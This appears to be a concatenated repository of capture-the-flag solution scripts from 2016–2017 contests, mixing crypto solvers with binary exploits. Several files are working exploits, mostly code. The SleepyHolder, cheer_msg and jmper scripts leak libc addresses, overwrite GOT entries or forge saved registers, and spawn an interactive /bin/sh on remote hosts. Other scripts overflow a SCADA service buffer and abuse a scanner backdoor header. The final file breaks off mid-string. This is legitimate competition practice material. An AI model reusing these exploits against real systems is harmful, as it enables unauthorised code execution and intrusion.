--------------------------------------------------------------------------------
/2016/0ctf/equation/solve.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | sage solve.py|sh
3 | 
4 | 


--------------------------------------------------------------------------------
/2016/h3ctf/h3_file_check/solve.py:
--------------------------------------------------------------------------------
 1 | """
 2 | Treasure Island:04250:2:7888
 3 | Gulliver's Travels:30984:1:5597
 4 | Alice in Wonderland:61142:3:1703
 5 | """
 6 | with open('fileidx', 'r') as f:
 7 |     data = f.read()
 8 | 
 9 | fileidx = ''.join(map(lambda x:chr(int(x,2)), [data[i:i+8] for i in xrange(0, len(data), 8)]))
10 | print(fileidx)
11 | 
12 | with open('04250', 'rb') as f:
13 |     data = f.read()
14 | 
15 | b = bytearray(data)
16 | for i in xrange(len(b)):
17 |     b[i] >>= 1
18 | print(b)
19 | 
20 | with open('30984', 'rb') as f:
21 |     data = f.read()
22 | b = bytearray(data)
23 | for i in xrange(len(b)):
24 |     b[i] &= 0x7f
25 | print(b)
26 | 
27 | x = """CB FD 3F BE DA 05 03 B7  FF FE 73 34 53 30 CE 34
28 | B4 7E C7 66 13 76 BD 4F  94 FA 6D 9A 82 90 43 E5
29 | A9 21 9F A8 0B 5D 36 35  81 CD 32 84 01 48 0B 1D
30 | CC 9D E0 B8 A0 66 BE C9  6D CD E3 DC 7F 5D 1A C1
31 | E4 78 09 E6 F4 DF 9A 2F  59 04 C1 44 86 2B 80 27
32 | 9C B7 67 BD 7D A5 B9 6A  FA 8E 66 CB 69 92 13 64
33 | 6A A7 F3 9B 8E 40 DD 76  21 EC E3 B6 6C DB CB 0F
34 | E0 C5 68 52 06 C3 05 29  29 2E 9F 82 50 16 F4 63
35 | 5A CB F4 0C 7F D0 E9 F2  D2 98 FD D6 C0 59 DC E4
36 | 99 8E 2C 3D 32 B0 17 C6  1A 15 5F 78 40 A2 16 B3
37 | B4 30 F4 55 D9 42 C3 E1  43 C3 40 56 29 EA 31 F1
38 | D0 1D 25 F6 C2 CC 86 50  B4 2F B8 A7 AA 76 83 52
39 | 47 51 7E 05 99 DD 90 FF  79 14 4F CC D5 4A B4 38
40 | 8E 3A C7 7B DA 47 F8 1E  81 A0 37 F4 DA E4 00 3D
41 | 5A 2F E6 AC 50 21 B4 00  6E 15 64 D6 69 40 D2 B1
42 | 16 E4 3B FB 0A 0F F4 97  83 00 F9 3D 7F 5B 60 CE"""
43 | x = bytearray(x.replace("\n", "").replace(" ","").decode("hex"))
44 | print(hex(x[0]))
45 | with open('61142', 'rb') as f:
46 |     data = f.read()
47 | 
48 | b = bytearray(data)
49 | t = 0
50 | for i in xrange(len(b)):
51 |     b[i] ^= x[t]
52 |     t = b[i]
53 | print(b)
54 | 
55 | 


--------------------------------------------------------------------------------
/2016/h3ctf/pydrm/solve.py:
--------------------------------------------------------------------------------
1 | b = [0x87, 0x9a, 0x92, 0x8e, 0x8b, 0x85, 0x8b, 0x96, 0x81, 0x8b, 0x95, 0x81,
2 |         0x84, 0x87, 0x96, 0x96, 0x87, 0x94, 0x81, 0x96, 0x8a, 0x83, 0x90, 0x81,
3 |         0x8b, 0x8f, 0x92, 0x8e, 0x8b, 0x85, 0x8b, 0x96]
4 | c = []
5 | for d in b:
6 |     c.append(chr(d-34))
7 | 
8 | print(''.join(c))
9 | 


--------------------------------------------------------------------------------
/2016/h3ctf/quest/solve.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import re
 3 | import base64
 4 | import zlib
 5 | 
 6 | url = 'http://10.10.10.29/quest'
 7 | logs = set()
 8 | def get_item(data = None):
 9 |     r = requests.post(url, data = data)
10 |     m = re.search('name="info" value="(.*)"', r.text)
11 | 
12 |     for line in r.text.splitlines():
13 |         if line.startswith('var items='):
14 |             items = re.findall('"(.*?)"', line)
15 |         if line.startswith('<div id="log">'):
16 |             if not line in logs:
17 |                 print(line)
18 |                 logs.add(line)
19 |     if m:
20 |         return m.group(1), items
21 | 
22 | """
23 | visited = set()
24 | info, items = get_item()
25 | queue = []
26 | queue.append((info, items))
27 | while queue:
28 |     info, items = queue.pop()
29 |     items = []
30 |     for i in xrange(15):
31 |         items.append("item%02d" % i)
32 |     visited.add(info)
33 |     for item in items:
34 |         data = {'info':info, 'click':"%s:0" % item}
35 |         new_info, new_items = get_item(data)
36 |         #print(new_info, new_items)
37 |         if not new_info in visited:
38 |             queue.append((new_info, new_items))
39 | """
40 | print("TRY NEW")
41 | info = "eJyrVsrMK0vNK8kvqlSyUog21VEwiNVRUCrOLEkF8o2AzKLU3PwyECfaHCSTn5ZWnFoC5BrUAgAufhHH"
42 | info = base64.b64decode(info)
43 | print(zlib.decompress(info))
44 | print(base64.b64encode(zlib.compress('{"inventory": [5, 6, 0], "site": 2, "remove": [7], "offset": 0}')))
45 | 


--------------------------------------------------------------------------------
/2016/h3ctf/ringworld/solve.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <fcntl.h>
 4 | #include <sys/types.h>
 5 | #include <sys/socket.h>
 6 | #include <arpa/inet.h>
 7 | #include <stdint.h>
 8 | #include <string.h>
 9 | #include <ctype.h>
10 | #include <unistd.h>
11 | 
12 | #include "common.h"
13 | 
14 | void usage(char **argv)
15 | {
16 | 	fprintf(stderr, "Usage: %s <Server IP>\n", argv[0]);
17 | 	exit(-1);
18 | }
19 | 
20 | int main(int argc, char **argv)
21 | {
22 | 	char buf[4096];
23 | 	bzero(buf, 4096);
24 | 	if (argc < 2) {
25 | 		usage(argv);
26 | 	}
27 | 
28 | 	printf("Enter a string to capitalize => ");
29 | 	fgets(buf, 4096, stdin);
30 | 	int input_len = strnlen(buf, 4095) + 1;
31 | 
32 | 	int sock = socket(AF_INET, SOCK_STREAM, 0);
33 | 
34 | 	struct sockaddr_in srv_addr = {
35 | 		.sin_family = AF_INET,
36 | 		.sin_port = htons(1337),
37 | 		.sin_addr.s_addr = inet_addr(argv[1])
38 | 	};
39 | 
40 | 	socklen_t addr_size = sizeof(srv_addr);
41 | 
42 | 	connect(sock, (struct sockaddr *)&srv_addr, addr_size);
43 | 	request_t rq = {
44 | 		.msg_len = htonl(input_len),
45 | 		.type = 0,
46 | 	};
47 |   rq.msg_len = htonl(4096);
48 | 
49 | 	send(sock, &rq, sizeof(rq), 0);
50 | 	send(sock, buf, input_len, 0);
51 | 
52 |   while(1) {
53 | 	int size = recv(sock, buf, 4096, 0);
54 | 	size += recv(sock, buf + size, 4096, 0);
55 | 	buf[4095] = '\0';
56 | 
57 |   int i = 0;
58 |   for (i = 0; i < 4096; i++) {
59 |     printf("%c", buf[i]);
60 |   }
61 |   printf("\n");
62 | 	printf("Received: %s\n", buf);
63 |   }
64 | 
65 | 	return 0;
66 | }
67 | 


--------------------------------------------------------------------------------
/2016/h3ctf/secure_scada_systems/solve.py:
--------------------------------------------------------------------------------
 1 | from socket import *
 2 | import thread
 3 | import sys
 4 | import struct
 5 | 
 6 | def recv_thread(f):
 7 |     while True:
 8 |         sys.stdout.write(f.read(1))
 9 | 
10 | s = create_connection(('10.10.10.42', 8766))
11 | f = s.makefile(bufsize = 0)
12 | thread.start_new_thread(recv_thread, (f,))
13 | f.write("new\n".ljust(256,"\x00"))
14 | payload = "A"*0x8c
15 | payload += struct.pack('<I', 0x0804C010 - 0x90)
16 | payload += struct.pack('<I', 0x0804C014 - 0x90)
17 | f.write((payload+"\n").ljust(256, "\x00"))
18 | f.write("send\n".ljust(256, "\x00"))
19 | f.write("0\n".ljust(256, "\x00"))
20 | f.write("admin\n".ljust(256, "\x00"))
21 | f.flush()
22 | raw_input()
23 | 


--------------------------------------------------------------------------------
/2016/hitcon/SleepyHolder/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | #context.log_level = 'debug'
 4 | 
 5 | e = ELF('SleepyHolder')
 6 | libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
 7 | 
 8 | def read_banner():
 9 |     r.recvuntil("3. Renew secret\n")
10 | 
11 | def keep_secret(opt, data):
12 |     read_banner()
13 |     r.send("1\n")
14 |     r.send("%d\n" % opt)
15 |     r.recvuntil("secret: \n")
16 |     r.send(data)
17 | 
18 | def wipe_secret(opt):
19 |     read_banner()
20 |     r.send("2\n")
21 |     r.recvuntil("Big secret\n")
22 |     r.send("%d\n" % opt)
23 | 
24 | def renew_secret(opt, data):
25 |     read_banner()
26 |     r.send("3\n")
27 |     r.recvuntil("Big secret\n")
28 |     r.send("%d\n" % opt)
29 |     r.recvuntil("secret: \n")
30 |     r.send(data)
31 | 
32 | small_buf_ptr = 0x6020d0
33 | 
34 | r = remote('localhost', 9999)
35 | keep_secret(1, "A" * 0x28)
36 | keep_secret(2, "A" * 0x28)
37 | wipe_secret(1)
38 | keep_secret(3, "A" * 0x28)
39 | wipe_secret(1)
40 | # Fake chunk: [0x20, 0x20, fd, bk] + prev_size of the next chunk
41 | keep_secret(1, p64(0x20) + p64(0x20) + p64(small_buf_ptr - 8 * 3) + p64(small_buf_ptr - 8 * 2) + p64(0x20))
42 | 
43 | # unlink()
44 | wipe_secret(2)
45 | 
46 | # *small_buf_ptr = small_buf_ptr - 8 * 3
47 | ptr = small_buf_ptr - 8 * 3
48 | 
49 | # big_buf_ptr = free@got
50 | renew_secret(1, p64(0) + p64(e.got['free']) + p64(0) + p64(ptr) + p64(1))
51 | # modify free@got -> puts
52 | renew_secret(2, p64(e.plt['puts']))
53 | # big_buf_ptr = puts@got
54 | renew_secret(1, p64(0) + p64(e.got['puts']))
55 | # leak
56 | wipe_secret(2)
57 | 
58 | libc_base = u64(r.readline().strip().ljust(8, "\x00")) - libc.symbols['puts']
59 | print("LIBC_BASE: %16X" % libc_base)
60 | 
61 | system = libc_base + libc.symbols['system']
62 | print("SYSTEM: %16X" % system)
63 | 
64 | bin_sh = libc_base + libc.search('/bin/sh').next()
65 | print("/bin/sh: %16X" % bin_sh)
66 | 
67 | # big_buf_ptr = free@got
68 | renew_secret(1, p64(0) + p64(e.got['free']) + p64(0) + p64(ptr) + p64(1))
69 | # modify free@got -> system
70 | renew_secret(2, p64(system))
71 | # big_buf_ptr = "/bin/sh"
72 | renew_secret(1, p64(0) + p64(bin_sh))
73 | wipe_secret(2)
74 | 
75 | r.interactive()
76 | 


--------------------------------------------------------------------------------
/2017/0ctf/integrity/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from hashlib import md5
 3 | 
 4 | context.log_level = 'debug'
 5 | 
 6 | def sxor(s1, s2):
 7 |     s = ""
 8 |     for i in xrange(len(s1)):
 9 |         s += chr(ord(s1[i]) ^ ord(s2[i]))
10 |     return s
11 | 
12 | BS = 16
13 | 
14 | r = remote('202.120.7.217',8221)
15 | r.recvuntil('[l]ogin\n')
16 | r.send("r\n")
17 | 
18 | name = "admin".ljust(16, "A") + "\x1b" * 16
19 | r.send(name + "\n")
20 | 
21 | r.recvuntil("Here is your secret:\n")
22 | h = r.readline().strip().decode("hex")
23 | 
24 | md5_before = md5(name + "\x10" * 16).digest()
25 | md5_new = md5(name).digest()
26 | 
27 | new_iv = sxor(sxor(md5_before, md5_new), h[:BS])
28 | new_h = new_iv + h[BS:-BS]
29 | print(new_h.encode("hex"))
30 | 
31 | r.send("l\n")
32 | r.send(new_h.encode("hex")+"\n")
33 | 
34 | r.interactive()
35 | 
36 | # flag{Easy_br0ken_scheme_cann0t_keep_y0ur_integrity}
37 | 
38 | 


--------------------------------------------------------------------------------
/2017/0ctf/otp/decrypt.py:
--------------------------------------------------------------------------------
 1 | P = 0x10000000000000000000000000000000000000000000000000000000000000425L
 2 | 
 3 | def str2num(s):
 4 |     return int(s.encode('hex'), 16)
 5 | 
 6 | def process(m, k):
 7 |     tmp = m ^ k
 8 |     res = 0
 9 |     for i in bin(tmp)[2:]:
10 |         res = res << 1;
11 |         if (int(i)):
12 |             res = res ^ tmp
13 |         if (res >> 256):
14 |             res = res ^ P
15 |     return res
16 | 
17 | def keygen(seed):
18 |     #key = str2num(urandom(32))
19 |     # key = 0x2a51d5b1bd1abdee4999363397902036332916fbce0982ebd3f5ece8e3ea3959
20 |     key = 0xdb0f936a04210cac5d3166228b935bb5389f43e5876e733eec4ead96ec72d226L
21 |     while True:
22 |         yield key
23 |         key = process(key, seed)
24 | 
25 | def str2num(s):
26 |     return int(s.encode('hex'), 16)
27 | 
28 | with open("ciphertext", "r") as f:
29 |     out = map(lambda x: int(x, 16), f.read().splitlines())
30 | 
31 | fake_secret1 = "I_am_not_a_secret_so_you_know_me"
32 | fake_secret2 = "feeddeadbeefcafefeeddeadbeefcafe"
33 | secret = 0x472cab91ceb46abd08b68a856ca8ec6e156861ea1f186f21f356ad8bfde06b10L
34 | generator = keygen(secret)
35 | print(hex(out[0] ^ 0xdb0f936a04210cac5d3166228b935bb5389f43e5876e733eec4ead96ec72d226L)[2:-1].decode("hex"))
36 | print("%x" % generator.next())
37 | print("%x" % generator.next())
38 | print ("%x" % (str2num(fake_secret1) ^ out[1]))
39 | print ("%x" % (str2num(fake_secret2) ^ out[2]))
40 | 
41 | 


--------------------------------------------------------------------------------
/2017/0ctf/otp/solve.py:
--------------------------------------------------------------------------------
 1 | from z3 import *
 2 | 
 3 | """
 4 | m: 66dae1eed04738e5b515a45e1d2800a801f0b5004fe48b51a162798c051519c0
 5 | tmp: 7bb808fb1265984d474c53f7c4961c96091d4612e85ea30c00318ed647478a1
 6 | res: 43fdacf910180abdf16186922d28061f2706a21e5720baa7be434827d42f5964
 7 | """
 8 | m_val = BitVecVal(0x66dae1eed04738e5b515a45e1d2800a801f0b5004fe48b51a162798c051519c0, 256)
 9 | #tmp_val = BitVecVal(0x7bb808fb1265984d474c53f7c4961c96091d4612e85ea30c00318ed647478a1, 256)
10 | res_val = BitVecVal(0x43fdacf910180abdf16186922d28061f2706a21e5720baa7be434827d42f5964, 256)
11 | P = BitVecVal(0x10000000000000000000000000000000000000000000000000000000000000425L, 256)
12 | 
13 | s = Solver()
14 | m = BitVec("m", 256)
15 | k = BitVec("k", 256)
16 | res = []
17 | 
18 | tmp = m ^ k
19 | #s.add(tmp == tmp_val)
20 | res.append(BitVec("res_0", 256))
21 | s.add(res[0] == BitVecVal(0, 256))
22 | for i in xrange(256):
23 |     c1 = (Extract(255 - i, 255 - i, tmp) == BitVecVal(1, 1))
24 |     c2 = (Extract(255, 255, res[i]) == BitVecVal(1, 1))
25 | 
26 |     res.append(BitVec("res_%d" % (i + 1), 256))
27 |     s.add(res[i + 1] == If(c1,
28 |         If(c2, (res[i] << 1) ^ tmp ^ P, (res[i] << 1) ^ tmp),
29 |         If(c2, (res[i] << 1) ^ P, (res[i] << 1))))
30 | 
31 | s.add(res[256] == res_val)
32 | print(s.check())
33 | print("k=%s" % s.model()[k])
34 | 


--------------------------------------------------------------------------------
/2017/0ctf/py/solve.py:
--------------------------------------------------------------------------------
 1 | """
 2 | if op == 153:
 3 |     op = dis.opmap["LOAD_CONST"]
 4 | if op == 136:
 5 |     op = dis.opmap["MAKE_FUNCTION"]
 6 | if op == 145:
 7 |     op = dis.opmap["STORE_NAME"]
 8 | if op == 134:
 9 |     op = dis.opmap["IMPORT_NAME"]
10 | if op == 83:
11 |     op = dis.opmap["RETURN_VALUE"]
12 | if op == 97:
13 |     op = dis.opmap["LOAD_FAST"]
14 | if op == 104:
15 |     op = dis.opmap["STORE_FAST"]
16 | if op == 70:
17 |     op = dis.opmap["BINARY_MULTIPLY"]
18 | if op == 39:
19 |     op = dis.opmap["BINARY_ADD"]
20 | if op == 155:
21 |     op = dis.opmap["LOAD_GLOBAL"]
22 | if op == dis.opmap["DELETE_ATTR"]:
23 |     op = dis.opmap["LOAD_ATTR"]
24 | """
25 | 
26 | import rotor
27 | 
28 | def encrypt(data):
29 |     key_a = '!@#$%^&*'
30 |     key_b = 'abcdefgh'
31 |     key_c = '<>{}:"'
32 |     secret = key_a * 4 + '|' + (key_b + key_a + key_c) * 2 + '|' + key_b * 2 + 'EOF'
33 |     rot = rotor.newrotor(secret)
34 |     return rot.encrypt(data)
35 | 
36 | 
37 | def decrypt(data):
38 |     key_a = '!@#$%^&*'
39 |     key_b = 'abcdefgh'
40 |     key_c = '<>{}:"'
41 |     secret = key_a * 4 + '|' + (key_b + key_a + key_c) * 2 + '|' + key_b * 2 + 'EOF'
42 |     rot = rotor.newrotor(secret)
43 |     return rot.decrypt(data)
44 | 
45 | with open("encrypted_flag", "rb") as f:
46 |     data = f.read()
47 | 
48 | print(repr(decrypt(data)))
49 | 
50 | # flag{Gue55_opcode_G@@@me}
51 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/beat_in_the_box/solve.py:
--------------------------------------------------------------------------------
 1 | data = "GLI|nuXdfkXfmt)Ximf~Xjrtndz\x00"
 2 | print(len(data))
 3 | value = 0x3077C534 - 0x3077C4FC
 4 | 
 5 | for v3 in xrange(value):
 6 |     for v4 in xrange(value):
 7 |         #if v3 + 8 * v4 != value:
 8 |         #    continue
 9 | 
10 |         new_data = bytearray(data[:])
11 |         for i in xrange(0x1c):
12 |             new_data[i] = ((new_data[i] ^ v3) + v4) % 0x100
13 |         print(repr(new_data))
14 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/hiddensc/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | context.log_level='debug'
 4 | 
 5 | def main():
 6 |     r = remote('54.202.7.144', 6969)
 7 |     #r = remote('localhost', 8080)
 8 | 
 9 |     lo = 0
10 |     hi = 0x500000000000 #1 << 64
11 |     while True:
12 |         if lo > hi:
13 |             break
14 | 
15 |         r.recvuntil(' : ')
16 |         r.send("a\n")
17 |         r.recvuntil(' ')
18 | 
19 |         m = (hi + lo) / 2
20 | 
21 |         print("lo: %16X, hi: %16X, m: %16X" % (lo, hi, m))
22 |         r.send("%d\n" % m)
23 |         o = r.read(4)
24 |         if o == "free":
25 |             r.recvuntil(" ")
26 |             r.send("y\n")
27 |             lo = m + 1
28 |         else:
29 |             hi = m - 1
30 | 
31 |     r.recvuntil(' : ')
32 |     r.send("a\n")
33 |     r.recvuntil(' ')
34 |     r.send("%d\n" % (m-0x1000))
35 |     r.read(4)
36 |     if o == "free":
37 |         r.recvuntil(" ")
38 |         r.send("n\n")
39 |     else:
40 |         raise
41 | 
42 |     lo = 0
43 |     hi = 1 << 64
44 |     while True:
45 |         if lo > hi:
46 |             break
47 | 
48 |         r.recvuntil(' : ')
49 |         r.send("a\n")
50 |         r.recvuntil(' ')
51 | 
52 |         m = (hi + lo) / 2
53 | 
54 |         print("lo: %16X, hi: %16X, m: %16X" % (lo, hi, m))
55 |         r.send("%d\n" % m)
56 |         o = r.read(4)
57 |         if o == "free":
58 |             r.recvuntil(" ")
59 |             r.send("y\n")
60 |             lo = m + 1
61 |         else:
62 |             hi = m - 1
63 | 
64 |     r.interactive()
65 | 
66 | if __name__ == "__main__":
67 |     main()
68 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/hiddensc/try.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | #context.log_level='debug'
 3 | 
 4 | def main():
 5 |     start = 0x3A1BD70AC000 - 0x1000
 6 |     start -= 0x10000
 7 | 
 8 |     while True:
 9 |         try:
10 |             print("%08X" % start)
11 |             r = remote('54.202.7.144', 6969)
12 |             #r = remote('localhost', 8080)
13 |             r.recvuntil(' : ')
14 |             r.send("j\n")
15 |             r.recvuntil(' ')
16 |             r.send(("%d\n" % start).ljust(0x64))
17 |             r.send("id\nid\n")
18 |             print(r.readline())
19 |             print("FOUND: %08X" % start)
20 |             break
21 |         except:
22 |             pass
23 |         finally:
24 |             r.close()
25 |             start += 0x1000
26 | 
27 | if __name__ == "__main__":
28 |     main()
29 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/mpc/solve.py:
--------------------------------------------------------------------------------
 1 | from mpc import *
 2 | import requests
 3 | import json
 4 | 
 5 | (n,g), (lam,mu) = paillier_keygen()
 6 | 
 7 | print(n ,g, lam, mu)
 8 | 
 9 | data = {}
10 | data['n'] = n
11 | data['g'] = g
12 | data['poly'] = [1]
13 | #r = requests.post('http://localhost:8080', json.dumps(data))
14 | r = requests.post('http://54.191.171.202:1025', json.dumps(data))
15 | 
16 | data = json.loads(r.text)
17 | answer = ""
18 | for c in data:
19 |     answer += chr(paillier_decrypt((n, g), (lam, mu), c) & 0xff)
20 | 
21 | print(repr(answer))
22 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/rsa_buffet/solve.py:
--------------------------------------------------------------------------------
 1 | from Crypto.Cipher import AES,PKCS1_OAEP
 2 | from Crypto.PublicKey import RSA
 3 | from base64 import b64decode
 4 | import encrypt
 5 | from secretsharing import PlaintextToHexSecretSharer as SS
 6 | 
 7 | values = [0, 4, 3, 6]
 8 | plains = [[], [], [], []]
 9 | for i in values:
10 |     with open("pkey-%d.pem" % i) as f:
11 |         data = f.read()
12 |     data = data.splitlines()
13 |     data = data[1:-1]
14 |     data = ''.join(data)
15 | 
16 |     keyDER = b64decode(data)
17 |     keyPriv = RSA.importKey(keyDER)
18 | 
19 |     for j in xrange(1, 6):
20 |         with open("ciphertext-%d.bin" % j, 'rb') as f:
21 |             data = f.read()
22 |         data = encrypt.decrypt(keyPriv, data)
23 |         if data is not None:
24 |             values = data.splitlines()[1:]
25 |             for i, v in enumerate(values):
26 |                 plains[i].append(v)
27 | for v in plains:
28 |     print(SS.recover_secret(v))
29 | 
30 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/sponge/brute.c:
--------------------------------------------------------------------------------
 1 | #define BLOCK_SIZE 16
 2 | #include <openssl/aes.h>
 3 | #include <stdio.h>
 4 | #include <string.h>
 5 | #include <stdlib.h>
 6 | #include <unistd.h>
 7 |  #include <sys/types.h>
 8 |  #include <sys/stat.h>
 9 |  #include <fcntl.h>
10 | 
11 | int count = 0;
12 | #define TARGET "\xcf\xe6\xc3\xd5\x82\xc6"
13 | // #define TARGET "\xFA\x59\xCA\x34\x2B\x2E"
14 | // #define TARGET "\xe9\x2b\x23\xd9\xec\x34"
15 | //#define TARGET "\xef\x77\x85\x2b\x0a\x6b"
16 | #define TARGET1 "\xcf\xe6\xc3\xd5\x82\xc6"
17 | #define TARGET2 "\xaf\xcf\xec\xd2\x1a\x8d"
18 | #define TARGET3 "\x77\x40\x56\x0a\x1d\x64"
19 | #define TARGET4 "\x00\x00\x00\x00\x00\x00"
20 | unsigned char key[16];
21 | 
22 | void brute(unsigned char* buf, int depth) {
23 |   if (depth == 7) {
24 |     /*
25 |     for (int i = 0; i < 16; i++) {
26 |       printf("%02X", buf[i]);
27 |     }
28 |     printf("\n");
29 |     */
30 | 
31 |     AES_KEY enc_key;
32 |     unsigned char out[BLOCK_SIZE];
33 | 
34 |     AES_set_encrypt_key(key, 128, &enc_key);
35 |     AES_encrypt(buf, out, &enc_key);
36 | 
37 |     if (!memcmp(&out[10], TARGET1, 6) ||
38 |         !memcmp(&out[10], TARGET2, 6) ||
39 |         !memcmp(&out[10], TARGET3, 6) ||
40 |         !memcmp(&out[10], TARGET4, 6)) {
41 |       printf("FOUND!\n");
42 |       for (int i = 0; i < 16; i++) {
43 |         printf("%02X", buf[i]);
44 |       }
45 |       printf("\n");
46 |       exit(0);
47 |     }
48 |   }
49 |   else {
50 |     for (int i = 0; i < 256; i++) {
51 |       buf[depth] = i;
52 |       brute(buf, depth + 1);
53 |     }
54 |   }
55 | }
56 | 
57 | int main(int argc, char **argv)
58 | {
59 |   memset(key, 0, sizeof(key));
60 |   unsigned char buf[16];
61 |   memset(buf, 0, sizeof(buf));
62 | 
63 |   int fd = open("/dev/urandom", 0);
64 |   read(fd, buf, 10);
65 |   close(fd);
66 | 
67 |   brute(buf, 0);
68 | }
69 | 
70 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/sponge/solve.py:
--------------------------------------------------------------------------------
 1 | from hash import *
 2 | 
 3 | def get_xored():
 4 |     orig = '\xcb\xa5\xd1\x13\x9c4z<o\xc8\xaf\xcf\xec\xd2\x1a\x8d'
 5 |     mine = 'J/\xfb\x8bM\xcf\xb3\xc8\xe6\t\xaf\xcf\xec\xd2\x1a\x8d'
 6 |     xored = ""
 7 |     for i in xrange(16):
 8 |         xored += chr(ord(orig[i]) ^ ord(mine[i]))
 9 |     return xored[:10]
10 | 
11 | if __name__ == "__main__":
12 |     GIVEN = 'I love using sponges for crypto'
13 |     aes = AES.new('\x00'*16)
14 |     plain = "0000071B88FBEC2CEBBE000000000000".decode("hex")[:10]
15 |     plain += get_xored() + GIVEN[30:]
16 | 
17 |     h = Hasher()
18 |     t1 = h.hash(plain)
19 | 
20 |     h = Hasher()
21 |     t2 = h.hash(GIVEN)
22 | 
23 |     print(plain.encode("hex"))
24 | 


--------------------------------------------------------------------------------
/2017/bkp-ctf/wackusensor/solve.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | headers = {'ACUNETIX-ASPECT': 'enabled',
 4 |         'ACUNETIX-ASPECT-PASSWORD': '4faa9d4408780ae071ca2708e3f09449',
 5 |         'ACUNETIX-ASPECT-QUERIES': 'filelist asdf;'}
 6 | #params = {"super_secret_parameter_hahaha": "super_secret_file_containing_the_flag_you_should_read_it.php",
 7 | #        "asdf": "zxv"}
 8 | params = {"super_secret_parameter_hahaha": "style.css", "asdf":"Zxcv"}
 9 | #r = requests.get('http://54.200.58.235/index.php', headers=headers, params=params)
10 | r = requests.get('http://54.200.58.235/index.php', headers=headers, params=params)
11 | #r = requests.get('http://insu.gtisc.gatech.edu/share/index.php', headers=headers, params=params)
12 | 
13 | print(r)
14 | print(r.text)
15 | 


--------------------------------------------------------------------------------
/2017/seccon/README.md:
--------------------------------------------------------------------------------
1 | * mboard, shopping: incomplete 
2 | 


--------------------------------------------------------------------------------
/2017/seccon/cheer_msg/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | context.log_level = 'debug'
 3 | MAIN = 0x080485CA
 4 | PRINTF = 0x08048430
 5 | 
 6 | r = remote('cheermsg.pwn.seccon.jp', 30527)
 7 | raw_input()
 8 | x = "-158\n"
 9 | x += p32(PRINTF) + p32(0x080487AF) + p32(0x804A010) + p32(PRINTF) + p32(MAIN) + p32(0x080487E0)
10 | x += "\n"
11 | 
12 | r.recvuntil(">>")
13 | r.send(x)
14 | r.recvuntil("Message : \n")
15 | libc_base = u32(r.readline()[:4]) - 0x0004d410
16 | system = libc_base + 0x00040310
17 | bin_sh = libc_base + 0x0016084C
18 | 
19 | x = "-158\n" + p32(system) + "BBBB" + p32(bin_sh) + "\n"
20 | r.send(x)
21 | r.interactive()
22 | 
23 | 


--------------------------------------------------------------------------------
/2017/seccon/jmper/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | context.log_level = 'debug'
 3 | 
 4 | def menu():
 5 |     r.recvuntil("6. Bye :)\n")
 6 | 
 7 | def add():
 8 |     menu()
 9 |     r.send("1\n")
10 | 
11 | def memo(idx, d):
12 |     menu()
13 |     r.send("3\n")
14 |     r.send("%d\n" % idx)
15 |     r.send(d + "\n")
16 | 
17 | def sm(idx):
18 |     menu()
19 |     r.send("5\n")
20 |     r.send("%d\n" % idx)
21 | 
22 | def name(idx, d):
23 |     menu()
24 |     r.send("2\n")
25 |     r.send("%d\n" % idx)
26 |     r.send(d + "\n")
27 | 
28 | def sn(idx):
29 |     menu()
30 |     r.send("4\n")
31 |     r.send("%d\n" % idx)
32 | 
33 | def ror(x, y):
34 |     return (x >> y | x << (64 - y)) % (1<<64)
35 | 
36 | def rol(x, y):
37 |     return (x << y | x >> (64 - y)) % (1<<64)
38 | 
39 | def mangle(x, y):
40 |     return rol(x ^ y, 0x11)
41 | 
42 | MAIN = 0x400c31
43 | r = remote('jmper.pwn.seccon.jp', 5656)
44 | add()
45 | memo(0, "A"*32)
46 | sm(0)
47 | h = "ID:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
48 | heap_base = u32(r.readline()[len(h):len(h) + 4]) - 0x20
49 | #heap_base &= 0x00ffffff
50 | print("HEAP_ADDRESS : %16X" % (heap_base))
51 | add()
52 | memo(1, "\x78"*33)
53 | name(1, p64(heap_base - 0xc0))
54 | #raw_input()
55 | sn(1)
56 | l = r.readline()[3:3 + 16]
57 | enc_sp, enc_pc = u64(l[:8]), u64(l[8:])
58 | key = (ror(enc_pc, 0x11) ^ MAIN)
59 | enc_sp = ror(enc_sp, 0x11) ^ key
60 | sp = heap_base + 0xc28
61 | pc = 0x400CC3
62 | enc_sp = mangle(sp, key)
63 | enc_pc = mangle(pc, key)
64 | name(1, p64(enc_sp) + p64(enc_pc))
65 | print("Key : %16X" % key)
66 | 
67 | add()
68 | add()
69 | memo(3, "\x58"*33)
70 | name(3, p64(0x601FB0))
71 | sn(3)
72 | libc_base = u64(r.readline()[3:3+6] + "\x00"*2) - 0x0000000000021e50
73 | print("LIBC_BASE : %16X" % libc_base)
74 | 
75 | memo(0, "A" *8 +  p64(libc_base + 0x017C8C3) + p64(libc_base + 0x0000000000046590))
76 | 
77 | for i in xrange(29 - 5):
78 |     add()
79 | 
80 | add()
81 | memo(28, p64(libc_base + 0x017C8C3) + p64(libc_base + 0x0000000000046590))
82 | raw_input('gogo\n')
83 | add()
84 | 
85 | r.interactive()
86 | 


--------------------------------------------------------------------------------
/2017/seccon/lost_decryption/solve.py:
--------------------------------------------------------------------------------
 1 | import commands
 2 | from pwn import *
 3 | 
 4 | gdb = """b *main
 5 | r encrypt key.bin input output
 6 | set $rip=encrypt-0x8A0+0x700
 7 | set $rdi = {{RDI}}
 8 | set $rsi = {{RSI}}
 9 | b *(encrypt-0x8A0+0x873)
10 | c
11 | info reg $rax
12 | q"""
13 | 
